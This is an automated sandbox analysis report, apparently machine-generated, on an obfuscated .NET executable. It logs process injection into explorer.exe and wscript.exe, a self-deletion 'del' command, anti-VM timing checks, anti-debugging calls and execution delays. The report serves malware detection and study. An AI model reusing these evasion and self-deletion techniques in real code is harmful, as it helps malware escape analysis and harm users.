Source: C:\Users\user\Desktop\UaTmOE6yP9.exe

Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll

Jump to behavior

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7140:120:WilError_01

Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: C:\Users\user\Desktop\UaTmOE6yP9.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: UaTmOE6yP9.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: UaTmOE6yP9.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: wntdll.pdbUGP source: UaTmOE6yP9.exe, 00000003.00000002.412307284.0000000001360000.00000040.00000001.sdmp, wscript.exe, 00000009.00000002.609101316.0000000005200000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdb source: UaTmOE6yP9.exe, 00000003.00000002.412307284.0000000001360000.00000040.00000001.sdmp, wscript.exe

Data Obfuscation:

Binary or sample is protected by dotNetProtector

Show sources

Source: UaTmOE6yP9.exe	String found in binary or memory: dotNetProtector
Source: UaTmOE6yP9.exe, 00000000.00000000.341534610.00000000008E2000.00000020.00020000.sdmp	String found in binary or memory: qOrset_ShowInTaskbarFUseTwoDigitYearAltDirectorySeparatorChartmFirstCharM_firstCharTryParseHexCharStringToNumberStreamHeaderDESCryptoServiceProviderMethodBuilderModuleBuilderTypeBuilderAssemblyBuilderBinderTypeDefFinder_encoderlpBufferResourceManagerSet_LoggerDebuggerMakeQuantifierListenerOwnOwnerCreateProcessAsUserFetchReturnParameterm_returnParameterMDTableWriterget_IsPointerBitConverterOtherLetterGetTokenForInternalErrorResourceManagerMediatoramDesignatorsDecimalSeparatorIEnumeratorGetEnumerator.ctor_subtractor.cctordotNetProtectorget_IsConstructorFrameSecurityDescriptorCreateDecryptorIntPtrGet_ErasEnumTypeSpecsEnumMethodSemanticsGetCharacteristicsSystem.DiagnosticsAddMilliseconds_dynamicMethodsGetMethodsAllowBracesSystem.Runtime.InteropServicesSystem.Runtime.CompilerServicesSystem.ResourcesIsRTLResourcesplfrrokpkd.resourcesRejectChangesGet_MethodBodiesMDBeginWriteMethodBodiesEnumerateFileSystemEntriesVTablesEnableVisualStylesAbbreviatedEnglishEraNamesLoadCulturesFromNamesGetEnumNamesSet_DayNamesHasSpacesInDayNamesGetNumberOfFramesShortTimesGet_s_systemTimeZonesCorLibTypesGetExceptionTypesMethodAttributesFileAttributesTypeAttributesMethodImplAttributesGetCustomAttributesGetBytesProjectWinMDRefsM_stateFlagsBindingFlagsHijriMonthsLengthFlagsGetMethodImplementationFlagsSetImplementationFlagsModuleSearchPathsDateToTicksLiteralsEqualsAllStreamsSystem.Windows.FormsLevelConversionsGet_PointerToRelocationsm_methodInstantiationsSystem.CollectionsFunctionsCallingConventionsSet_OptionsTimeZoneInfoOptionsSigComparerOptionsGetAssertionsMethodImplInfosCalendarsget_CharsNumberOfLinenumbersGet_StreamHeadersGetOptionalCustomModifiersGetParametersAssertFiltersget_IsClassNoAccessAssemblyBuilderAccesshProcessGetCurrentProcesslpBaseAddressConvertRTInternalAddresslpAddressGet_WatsonBucketsCreateWindowsConcatM_bFormatIncludeSectCreateCaObjectGet_IsRequireSecObjectTaggedObjectStreamedObjectTypeObjectGetObjectobjectSelectFrameworkRedirectflProtectM_objSetM_normalPermSetCharSetNotECMADigitSetM_tryEndOffsetBaseFileOffsetFirstLevelOffsetSetStartOffsetMaxOptionShiftUnmanaged32Bit_64Bitop_ExplicitSystem.Reflection.Emit_ExitSetCompatibleTextRenderingDefaultFirstOrDefaultIAsyncResultresultOp_IncrementEnvironmentIsAllSecurityTransparentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.PropertyDef>.get_CurrentCheckRemoteDebuggerPresentIsDebuggerPresentGet_CurrExcStackCountM_labelCount_invocationCountReuseSlotGet_IsNewSlotParameterizedThreadStartConvertFailFastContiguousRidListDataHeaderListCopyToArrayListTttWaitTimeoutSuspendLayoutResumeLayoutMoveNextSystem.TextSet_SynchronizationContextcontext*
Source: UaTmOE6yP9.exe	String found in binary or memory: dotNetProtector
Source: UaTmOE6yP9.exe, 00000003.00000000.345884716.00000000008E2000.00000020.00020000.sdmp	String found in binary or memory: qOrset_ShowInTaskbarFUseTwoDigitYearAltDirectorySeparatorChartmFirstCharM_firstCharTryParseHexCharStringToNumberStreamHeaderDESCryptoServiceProviderMethodBuilderModuleBuilderTypeBuilderAssemblyBuilderBinderTypeDefFinder_encoderlpBufferResourceManagerSet_LoggerDebuggerMakeQuantifierListenerOwnOwnerCreateProcessAsUserFetchReturnParameterm_returnParameterMDTableWriterget_IsPointerBitConverterOtherLetterGetTokenForInternalErrorResourceManagerMediatoramDesignatorsDecimalSeparatorIEnumeratorGetEnumerator.ctor_subtractor.cctordotNetProtectorget_IsConstructorFrameSecurityDescriptorCreateDecryptorIntPtrGet_ErasEnumTypeSpecsEnumMethodSemanticsGetCharacteristicsSystem.DiagnosticsAddMilliseconds_dynamicMethodsGetMethodsAllowBracesSystem.Runtime.InteropServicesSystem.Runtime.CompilerServicesSystem.ResourcesIsRTLResourcesplfrrokpkd.resourcesRejectChangesGet_MethodBodiesMDBeginWriteMethodBodiesEnumerateFileSystemEntriesVTablesEnableVisualStylesAbbreviatedEnglishEraNamesLoadCulturesFromNamesGetEnumNamesSet_DayNamesHasSpacesInDayNamesGetNumberOfFramesShortTimesGet_s_systemTimeZonesCorLibTypesGetExceptionTypesMethodAttributesFileAttributesTypeAttributesMethodImplAttributesGetCustomAttributesGetBytesProjectWinMDRefsM_stateFlagsBindingFlagsHijriMonthsLengthFlagsGetMethodImplementationFlagsSetImplementationFlagsModuleSearchPathsDateToTicksLiteralsEqualsAllStreamsSystem.Windows.FormsLevelConversionsGet_PointerToRelocationsm_methodInstantiationsSystem.CollectionsFunctionsCallingConventionsSet_OptionsTimeZoneInfoOptionsSigComparerOptionsGetAssertionsMethodImplInfosCalendarsget_CharsNumberOfLinenumbersGet_StreamHeadersGetOptionalCustomModifiersGetParametersAssertFiltersget_IsClassNoAccessAssemblyBuilderAccesshProcessGetCurrentProcesslpBaseAddressConvertRTInternalAddresslpAddressGet_WatsonBucketsCreateWindowsConcatM_bFormatIncludeSectCreateCaObjectGet_IsRequireSecObjectTaggedObjectStreamedObjectTypeObjectGetObjectobjectSelectFrameworkRedirectflProtectM_objSetM_normalPermSetCharSetNotECMADigitSetM_tryEndOffsetBaseFileOffsetFirstLevelOffsetSetStartOffsetMaxOptionShiftUnmanaged32Bit_64Bitop_ExplicitSystem.Reflection.Emit_ExitSetCompatibleTextRenderingDefaultFirstOrDefaultIAsyncResultresultOp_IncrementEnvironmentIsAllSecurityTransparentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.PropertyDef>.get_CurrentCheckRemoteDebuggerPresentIsDebuggerPresentGet_CurrExcStackCountM_labelCount_invocationCountReuseSlotGet_IsNewSlotParameterizedThreadStartConvertFailFastContiguousRidListDataHeaderListCopyToArrayListTttWaitTimeoutSuspendLayoutResumeLayoutMoveNextSystem.TextSet_SynchronizationContextcontext*
Source: wscript.exe, 00000009.00000002.611779827.0000000005737000.00000004.00020000.sdmp	String found in binary or memory: dotNetProtector
Source: wscript.exe, 00000009.00000002.611779827.0000000005737000.00000004.00020000.sdmp	String found in binary or memory: qOrset_ShowInTaskbarFUseTwoDigitYearAltDirectorySeparatorChartmFirstCharM_firstCharTryParseHexCharStringToNumberStreamHeaderDESCryptoServiceProviderMethodBuilderModuleBuilderTypeBuilderAssemblyBuilderBinderTypeDefFinder_encoderlpBufferResourceManagerSet_LoggerDebuggerMakeQuantifierListenerOwnOwnerCreateProcessAsUserFetchReturnParameterm_returnParameterMDTableWriterget_IsPointerBitConverterOtherLetterGetTokenForInternalErrorResourceManagerMediatoramDesignatorsDecimalSeparatorIEnumeratorGetEnumerator.ctor_subtractor.cctordotNetProtectorget_IsConstructorFrameSecurityDescriptorCreateDecryptorIntPtrGet_ErasEnumTypeSpecsEnumMethodSemanticsGetCharacteristicsSystem.DiagnosticsAddMilliseconds_dynamicMethodsGetMethodsAllowBracesSystem.Runtime.InteropServicesSystem.Runtime.CompilerServicesSystem.ResourcesIsRTLResourcesplfrrokpkd.resourcesRejectChangesGet_MethodBodiesMDBeginWriteMethodBodiesEnumerateFileSystemEntriesVTablesEnableVisualStylesAbbreviatedEnglishEraNamesLoadCulturesFromNamesGetEnumNamesSet_DayNamesHasSpacesInDayNamesGetNumberOfFramesShortTimesGet_s_systemTimeZonesCorLibTypesGetExceptionTypesMethodAttributesFileAttributesTypeAttributesMethodImplAttributesGetCustomAttributesGetBytesProjectWinMDRefsM_stateFlagsBindingFlagsHijriMonthsLengthFlagsGetMethodImplementationFlagsSetImplementationFlagsModuleSearchPathsDateToTicksLiteralsEqualsAllStreamsSystem.Windows.FormsLevelConversionsGet_PointerToRelocationsm_methodInstantiationsSystem.CollectionsFunctionsCallingConventionsSet_OptionsTimeZoneInfoOptionsSigComparerOptionsGetAssertionsMethodImplInfosCalendarsget_CharsNumberOfLinenumbersGet_StreamHeadersGetOptionalCustomModifiersGetParametersAssertFiltersget_IsClassNoAccessAssemblyBuilderAccesshProcessGetCurrentProcesslpBaseAddressConvertRTInternalAddresslpAddressGet_WatsonBucketsCreateWindowsConcatM_bFormatIncludeSectCreateCaObjectGet_IsRequireSecObjectTaggedObjectStreamedObjectTypeObjectGetObjectobjectSelectFrameworkRedirectflProtectM_objSetM_normalPermSetCharSetNotECMADigitSetM_tryEndOffsetBaseFileOffsetFirstLevelOffsetSetStartOffsetMaxOptionShiftUnmanaged32Bit_64Bitop_ExplicitSystem.Reflection.Emit_ExitSetCompatibleTextRenderingDefaultFirstOrDefaultIAsyncResultresultOp_IncrementEnvironmentIsAllSecurityTransparentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.PropertyDef>.get_CurrentCheckRemoteDebuggerPresentIsDebuggerPresentGet_CurrExcStackCountM_labelCount_invocationCountReuseSlotGet_IsNewSlotParameterizedThreadStartConvertFailFastContiguousRidListDataHeaderListCopyToArrayListTttWaitTimeoutSuspendLayoutResumeLayoutMoveNextSystem.TextSet_SynchronizationContextcontext*
Source: UaTmOE6yP9.exe	String found in binary or memory: dotNetProtector
Source: UaTmOE6yP9.exe	String found in binary or memory: qOrset_ShowInTaskbarFUseTwoDigitYearAltDirectorySeparatorChartmFirstCharM_firstCharTryParseHexCharStringToNumberStreamHeaderDESCryptoServiceProviderMethodBuilderModuleBuilderTypeBuilderAssemblyBuilderBinderTypeDefFinder_encoderlpBufferResourceManagerSet_LoggerDebuggerMakeQuantifierListenerOwnOwnerCreateProcessAsUserFetchReturnParameterm_returnParameterMDTableWriterget_IsPointerBitConverterOtherLetterGetTokenForInternalErrorResourceManagerMediatoramDesignatorsDecimalSeparatorIEnumeratorGetEnumerator.ctor_subtractor.cctordotNetProtectorget_IsConstructorFrameSecurityDescriptorCreateDecryptorIntPtrGet_ErasEnumTypeSpecsEnumMethodSemanticsGetCharacteristicsSystem.DiagnosticsAddMilliseconds_dynamicMethodsGetMethodsAllowBracesSystem.Runtime.InteropServicesSystem.Runtime.CompilerServicesSystem.ResourcesIsRTLResourcesplfrrokpkd.resourcesRejectChangesGet_MethodBodiesMDBeginWriteMethodBodiesEnumerateFileSystemEntriesVTablesEnableVisualStylesAbbreviatedEnglishEraNamesLoadCulturesFromNamesGetEnumNamesSet_DayNamesHasSpacesInDayNamesGetNumberOfFramesShortTimesGet_s_systemTimeZonesCorLibTypesGetExceptionTypesMethodAttributesFileAttributesTypeAttributesMethodImplAttributesGetCustomAttributesGetBytesProjectWinMDRefsM_stateFlagsBindingFlagsHijriMonthsLengthFlagsGetMethodImplementationFlagsSetImplementationFlagsModuleSearchPathsDateToTicksLiteralsEqualsAllStreamsSystem.Windows.FormsLevelConversionsGet_PointerToRelocationsm_methodInstantiationsSystem.CollectionsFunctionsCallingConventionsSet_OptionsTimeZoneInfoOptionsSigComparerOptionsGetAssertionsMethodImplInfosCalendarsget_CharsNumberOfLinenumbersGet_StreamHeadersGetOptionalCustomModifiersGetParametersAssertFiltersget_IsClassNoAccessAssemblyBuilderAccesshProcessGetCurrentProcesslpBaseAddressConvertRTInternalAddresslpAddressGet_WatsonBucketsCreateWindowsConcatM_bFormatIncludeSectCreateCaObjectGet_IsRequireSecObjectTaggedObjectStreamedObjectTypeObjectGetObjectobjectSelectFrameworkRedirectflProtectM_objSetM_normalPermSetCharSetNotECMADigitSetM_tryEndOffsetBaseFileOffsetFirstLevelOffsetSetStartOffsetMaxOptionShiftUnmanaged32Bit_64Bitop_ExplicitSystem.Reflection.Emit_ExitSetCompatibleTextRenderingDefaultFirstOrDefaultIAsyncResultresultOp_IncrementEnvironmentIsAllSecurityTransparentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.PropertyDef>.get_CurrentCheckRemoteDebuggerPresentIsDebuggerPresentGet_CurrExcStackCountM_labelCount_invocationCountReuseSlotGet_IsNewSlotParameterizedThreadStartConvertFailFastContiguousRidListDataHeaderListCopyToArrayListTttWaitTimeoutSuspendLayoutResumeLayoutMoveNextSystem.TextSet_SynchronizationContextcontext*

Source: C:\Users\user\Desktop\UaTmOE6yP9.exe	Code function: 0_2_00915064 push ebp; ret	0_2_00915066
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe	Code function: 0_2_01792877 push ebx; ret	0_2_0179287A
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe	Code function: 3_2_0041B822 push eax; ret	3_2_0041B828
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe	Code function: 3_2_0041B82B push eax; ret	3_2_0041B892
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe	Code function: 3_2_0041502F push esp; iretd	3_2_00415032
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe	Code function: 3_2_0041B88C push eax; ret	3_2_0041B892
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe	Code function: 3_2_00416092 push ebx; retf	3_2_00416097
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe	Code function: 3_2_00416099 push ss; iretd	3_2_004160B7
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe	Code function: 3_2_004160BB push ss; iretd	3_2_004160B7
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe	Code function: 3_2_00416105 push ss; iretd	3_2_004160B7
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe	Code function: 3_2_00415CE7 push ss; iretd	3_2_00415CE9
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe	Code function: 3_2_00418556 push eax; ret	3_2_00418559
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe	Code function: 3_2_00414EEC push 395C2345h; retf	3_2_00414EF3
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe	Code function: 3_2_00414F42 push ebp; ret	3_2_00414F4A
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe	Code function: 3_2_0041B7D5 push eax; ret	3_2_0041B828
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe	Code function: 3_2_00915064 push ebp; ret	3_2_00915066
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_0527D0D1 push ecx; ret	9_2_0527D0E4
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_00DD6099 push ss; iretd	9_2_00DD60B7
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_00DD6092 push ebx; retf	9_2_00DD6097
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_00DDB88C push eax; ret	9_2_00DDB892
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_00DD60BB push ss; iretd	9_2_00DD60B7
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_00DD502F push esp; iretd	9_2_00DD5032
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_00DDB82B push eax; ret	9_2_00DDB892
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_00DDB822 push eax; ret	9_2_00DDB828
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_00DD6105 push ss; iretd	9_2_00DD60B7
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_00DD5CE7 push ss; iretd	9_2_00DD5CE9
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_00DD8556 push eax; ret	9_2_00DD8559
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_00DD4EEC push 395C2345h; retf	9_2_00DD4EF3
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_00DDB7D5 push eax; ret	9_2_00DDB828
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_00DD4F42 push ebp; ret	9_2_00DD4F4A

Source: UaTmOE6yP9.exe

Static PE information: real checksum: 0x5063c should be: 0x10803c

Source: initial sample

Static PE information: section name: .text entropy: 7.77367738512

Hooking and other Techniques for Hiding and Protection:

Self deletion via cmd delete

Show sources

Source: C:\Windows\SysWOW64\wscript.exe	Process created: /c del 'C:\Users\user\Desktop\UaTmOE6yP9.exe'
Source: C:\Windows\SysWOW64\wscript.exe	Process created: /c del 'C:\Users\user\Desktop\UaTmOE6yP9.exe'			Jump to behavior

Source: C:\Users\user\Desktop\UaTmOE6yP9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Tries to delay execution (extensive OutputDebugStringW loop)

Show sources

Source: C:\Users\user\Desktop\UaTmOE6yP9.exe

Section loaded: OutputDebugStringW count: 229

Tries to detect virtualization through RDTSC time measurements

Show sources

Source: C:\Users\user\Desktop\UaTmOE6yP9.exe	RDTSC instruction interceptor: First address: 0000000000408604 second address: 000000000040860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe	RDTSC instruction interceptor: First address: 000000000040899E second address: 00000000004089A4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\wscript.exe	RDTSC instruction interceptor: First address: 0000000000DC8604 second address: 0000000000DC860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\wscript.exe	RDTSC instruction interceptor: First address: 0000000000DC899E second address: 0000000000DC89A4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

Source: C:\Users\user\Desktop\UaTmOE6yP9.exe TID: 6588	Thread sleep time: -214000s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 4768	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe TID: 6632	Thread sleep time: -34000s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\UaTmOE6yP9.exe	Last function: Thread delayed
Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\wscript.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\UaTmOE6yP9.exe

Code function: 3_2_004088D0 rdtsc

3_2_004088D0

Source: C:\Users\user\Desktop\UaTmOE6yP9.exe

Process information queried: ProcessInformation

Jump to behavior

Source: explorer.exe, 00000005.00000000.385097826.0000000008430000.00000004.00000001.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: explorer.exe, 00000005.00000000.384921628.00000000083E9000.00000004.00000001.sdmp	Binary or memory string: VMware SATA CD00dRom0
Source: explorer.exe, 00000005.00000000.370237561.000000000461E000.00000004.00000001.sdmp	Binary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000005.00000000.356293831.00000000062E0000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000005.00000000.384921628.00000000083E9000.00000004.00000001.sdmp	Binary or memory string: VMware SATA CD00
Source: explorer.exe, 00000005.00000000.356293831.00000000062E0000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000005.00000000.385697655.000000000866E000.00000004.00000001.sdmp	Binary or memory string: 0ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&-
Source: explorer.exe, 00000005.00000000.361282017.00000000082E2000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>
Source: explorer.exe, 00000005.00000000.401542053.0000000008552000.00000004.00000001.sdmp	Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}osoft S
Source: explorer.exe, 00000005.00000000.361282017.00000000082E2000.00000004.00000001.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
Source: explorer.exe, 00000005.00000000.385097826.0000000008430000.00000004.00000001.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000-;
Source: explorer.exe, 00000005.00000000.391155069.000000000095C000.00000004.00000020.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}G

Anti Debugging:

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Show sources

Source: C:\Users\user\Desktop\UaTmOE6yP9.exe

Code function: 0_2_0179CA94 CheckRemoteDebuggerPresent,

0_2_0179CA94

Source: C:\Users\user\Desktop\UaTmOE6yP9.exe

Code function: 3_2_004088D0 rdtsc

3_2_004088D0

Source: C:\Users\user\Desktop\UaTmOE6yP9.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_05244120 mov eax, dword ptr fs:[00000030h]	9_2_05244120
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_05244120 mov eax, dword ptr fs:[00000030h]	9_2_05244120
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_05244120 mov eax, dword ptr fs:[00000030h]	9_2_05244120
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_05244120 mov eax, dword ptr fs:[00000030h]	9_2_05244120
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_05244120 mov ecx, dword ptr fs:[00000030h]	9_2_05244120
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_0522AD30 mov eax, dword ptr fs:[00000030h]	9_2_0522AD30
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_05233D34 mov eax, dword ptr fs:[00000030h]	9_2_05233D34
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_05233D34 mov eax, dword ptr fs:[00000030h]	9_2_05233D34
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_05233D34 mov eax, dword ptr fs:[00000030h]	9_2_05233D34
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_05233D34 mov eax, dword ptr fs:[00000030h]	9_2_05233D34
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_05233D34 mov eax, dword ptr fs:[00000030h]	9_2_05233D34
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_05233D34 mov eax, dword ptr fs:[00000030h]	9_2_05233D34
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_05233D34 mov eax, dword ptr fs:[00000030h]	9_2_05233D34
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_05233D34 mov eax, dword ptr fs:[00000030h]	9_2_05233D34
